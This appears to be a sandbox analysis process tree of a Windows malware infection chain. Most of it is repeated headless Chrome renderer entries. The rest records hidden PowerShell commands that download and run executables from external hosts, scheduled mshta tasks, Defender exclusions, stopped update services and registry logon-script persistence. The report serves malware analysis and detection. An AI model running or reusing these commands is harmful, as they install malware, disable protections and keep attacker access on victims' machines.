                                                                                                                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.72.93 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\Temp\HeadlessChrome6492240707625" --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-databases --disable-gpu-compositing --disable-blink-features=AutomationControlled --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --field-trial-handle=5288,i,5124931169395430665,17416238259355112462,262144 --enable-features=Plugins --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5000 /prefetch:1
                                                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                                                          PID:7496
                                                                                                                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.72.93 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\Temp\HeadlessChrome6492240707625" --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-databases --disable-gpu-compositing --disable-blink-features=AutomationControlled --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --field-trial-handle=5252,i,5124931169395430665,17416238259355112462,262144 --enable-features=Plugins --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5044 /prefetch:1
                                                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                                                            PID:5396
                                                                                                                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.72.93 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\Temp\HeadlessChrome6492240707625" --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-databases --disable-gpu-compositing --disable-blink-features=AutomationControlled --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --field-trial-handle=5276,i,5124931169395430665,17416238259355112462,262144 --enable-features=Plugins --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5176 /prefetch:1
                                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                                              PID:6384
                                                                                                                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.72.93 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\Temp\HeadlessChrome6492240707625" --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-databases --disable-gpu-compositing --disable-blink-features=AutomationControlled --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --field-trial-handle=4604,i,5124931169395430665,17416238259355112462,262144 --enable-features=Plugins --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5184 /prefetch:1
                                                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                                                PID:6552
                                                                                                                                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.72.93 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\Temp\HeadlessChrome6492240707625" --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-databases --disable-gpu-compositing --disable-blink-features=AutomationControlled --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --field-trial-handle=4744,i,5124931169395430665,17416238259355112462,262144 --enable-features=Plugins --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4972 /prefetch:1
                                                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                                                  PID:776
                                                                                                                                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.72.93 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\Temp\HeadlessChrome6492240707625" --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-databases --disable-gpu-compositing --disable-blink-features=AutomationControlled --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --field-trial-handle=5528,i,5124931169395430665,17416238259355112462,262144 --enable-features=Plugins --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5376 /prefetch:1
                                                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                                                    PID:7716
                                                                                                                                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.72.93 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\Temp\HeadlessChrome6492240707625" --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-databases --disable-gpu-compositing --disable-blink-features=AutomationControlled --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --field-trial-handle=4008,i,5124931169395430665,17416238259355112462,262144 --enable-features=Plugins --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5380 /prefetch:1
                                                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                                                      PID:5292
                                                                                                                                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.72.93 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\Temp\HeadlessChrome6492240707625" --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-databases --disable-gpu-compositing --disable-blink-features=AutomationControlled --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --field-trial-handle=5652,i,5124931169395430665,17416238259355112462,262144 --enable-features=Plugins --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5660 /prefetch:1
                                                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                                                        PID:6988
                                                                                                                                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.72.93 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\Temp\HeadlessChrome6492240707625" --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-databases --disable-gpu-compositing --disable-blink-features=AutomationControlled --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --field-trial-handle=5668,i,5124931169395430665,17416238259355112462,262144 --enable-features=Plugins --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5656 /prefetch:1
                                                                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                                                                          PID:6592
                                                                                                                                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.72.93 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\Temp\HeadlessChrome6492240707625" --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-databases --disable-gpu-compositing --disable-blink-features=AutomationControlled --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --field-trial-handle=5684,i,5124931169395430665,17416238259355112462,262144 --enable-features=Plugins --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5676 /prefetch:1
                                                                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                                                                            PID:7660
                                                                                                                                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.72.93 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\Temp\HeadlessChrome6492240707625" --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-databases --disable-gpu-compositing --disable-blink-features=AutomationControlled --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --field-trial-handle=5700,i,5124931169395430665,17416238259355112462,262144 --enable-features=Plugins --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5692 /prefetch:1
                                                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                                                              PID:1992
                                                                                                                                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.72.93 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\Temp\HeadlessChrome6492240707625" --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-databases --disable-gpu-compositing --disable-blink-features=AutomationControlled --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --field-trial-handle=5424,i,5124931169395430665,17416238259355112462,262144 --enable-features=Plugins --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5624 /prefetch:1
                                                                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                                                                PID:6816
                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\10216000101\af7c61d1e4.exe
                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\10216000101\af7c61d1e4.exe"
                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                            PID:6104
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c schtasks /create /tn ojeLQma3am9 /tr "mshta C:\Users\Admin\AppData\Local\Temp\MoU2X094Q.hta" /sc minute /mo 25 /ru "Admin" /f
                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                PID:3928
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                  schtasks /create /tn ojeLQma3am9 /tr "mshta C:\Users\Admin\AppData\Local\Temp\MoU2X094Q.hta" /sc minute /mo 25 /ru "Admin" /f
                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                                                                                  PID:2340
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                mshta C:\Users\Admin\AppData\Local\Temp\MoU2X094Q.hta
                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                  PID:424
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WEUWMFI6XQEWYKEJ8PSBW9FC3LCKL9KI.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                    PID:3556
                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\TempWEUWMFI6XQEWYKEJ8PSBW9FC3LCKL9KI.EXE
                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\TempWEUWMFI6XQEWYKEJ8PSBW9FC3LCKL9KI.EXE"
                                                                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                                                                        PID:7268
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10216010121\am_no.cmd" "
                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                    PID:4260
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                                      timeout /t 2
                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                      PID:4676
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                        PID:7972
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                          powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                          PID:8048
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                          PID:7644
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                            powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                            PID:7688
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                            PID:4216
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                              powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                              PID:1000
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                            schtasks /create /tn "XnUiamaz35o" /tr "mshta \"C:\Temp\HtV0LXJoU.hta\"" /sc minute /mo 25 /ru "Admin" /f
                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                                                                                            PID:7296
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                            mshta "C:\Temp\HtV0LXJoU.hta"
                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                              PID:7524
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                                PID:7508
                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                                                                                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                                                                                    PID:7576
                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10216190101\b0hgYat.exe
                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10216190101\b0hgYat.exe"
                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                PID:7788
                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\10216290101\9u6doIF.exe
                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\10216290101\9u6doIF.exe"
                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                  PID:6308
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.4.4.9118\f01947c788fc5afe\ScreenConnect.ClientSetup.msi"
                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                      PID:6624
                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10216320101\9u6doIF.exe
                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10216320101\9u6doIF.exe"
                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                      PID:7656
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.4.4.9118\f01947c788fc5afe\ScreenConnect.ClientSetup.msi"
                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                          PID:8040
                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10216330101\79380c23ef.exe
                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10216330101\79380c23ef.exe"
                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                          PID:6912
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                                            "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                              PID:13200
                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10216340101\bcedffee77.exe
                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10216340101\bcedffee77.exe"
                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                              PID:6248
                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\10216340101\bcedffee77.exe
                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\10216340101\bcedffee77.exe"
                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                  PID:4896
                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\10216350101\b0hgYat.exe
                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\10216350101\b0hgYat.exe"
                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                  PID:12836
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\10216360101\IgTUAvH.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\10216360101\IgTUAvH.exe"
                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                    PID:12604
                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\mine.exe
                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\mine.exe"
                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                        PID:13804
                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                                                          PID:13192
                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                            PID:11892
                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                            • Launches sc.exe
                                                                                                                                                                                                                                                                                                                                                            PID:11900
                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                            • Launches sc.exe
                                                                                                                                                                                                                                                                                                                                                            PID:12176
                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10216370101\v6Oqdnc.exe
                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10216370101\v6Oqdnc.exe"
                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                          PID:12352
                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\10216380101\ADFoyxP.exe
                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\10216380101\ADFoyxP.exe"
                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                            PID:12576
                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                              powershell.exe -c "Invoke-WebRequest -Uri 'https://safetyingold.com/share/4822aa372544ea4642142339b22d22421d08bdb543cd2de334b3fd0e5fc07565.exe' -OutFile 'C:\Users\Admin\AppData\Roaming\Microsoft\Protect\rsfff01fff.exe' -Headers @{'User-Agent'='build2'}"
                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                                                              PID:6476
                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                              powershell.exe -c "Set-ItemProperty -Path 'HKCU:\Environment' -Name 'UserinitMprLogonScript' -Value 'C:\Users\Admin\AppData\Roaming\Microsoft\Protect\rsfff01fff.exe'"
                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                                                              PID:9912
                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10216390101\HmngBpR.exe
                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10216390101\HmngBpR.exe"
                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                              PID:13920
                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\archivebrowser_GD\SplashWin.exe
                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\archivebrowser_GD\SplashWin.exe
                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:12688
                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\archivebrowser_GD\SplashWin.exe
                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Roaming\archivebrowser_GD\SplashWin.exe
                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:12684
                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:12764
                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:7544
                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 7544 -s 744
                                                                                                                                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                                                                                                                                                                PID:9532
                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\10216400101\JFN8FJt.exe
                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\10216400101\JFN8FJt.exe"
                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                        PID:13632
                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:12780
                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\10216410101\7KVoLQr.exe
                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\10216410101\7KVoLQr.exe"
                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:13484
